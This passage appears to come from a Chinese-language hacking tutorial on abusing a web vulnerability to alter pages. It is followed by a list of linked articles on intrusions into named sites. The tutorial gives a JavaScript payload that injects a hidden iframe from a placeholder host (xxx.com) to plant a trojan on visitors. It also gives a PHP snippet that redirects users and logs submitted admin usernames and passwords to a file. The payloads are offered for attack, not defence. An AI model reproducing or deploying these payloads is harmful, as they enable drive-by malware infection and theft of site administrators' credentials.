|
大家看看返回了什么,直接就可以改页面了,如图6所示。
如果想挂马就更容易了,JS内容改为:
| 以下是引用片段: document.write("<iframe style='display:none;' src='http://xxx.com/xx.htm'%3E%3C/iframe%3E%22); |


| 以下是引用片段: <?php Header("Location: http://127.0.0.1:81/test/index.php?%22); if(isset($_POST['$admin_name'])&&isset($_POST['$admin_pass'])){ $file_path="password.txt"; $file = @fopen($file_path,"a"); $string = "Username:".$_POST['a_name']."and password:".$_POST['a_pass']."\n"; @fwrite($file,$string); @fclose($file); } ?> |

| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |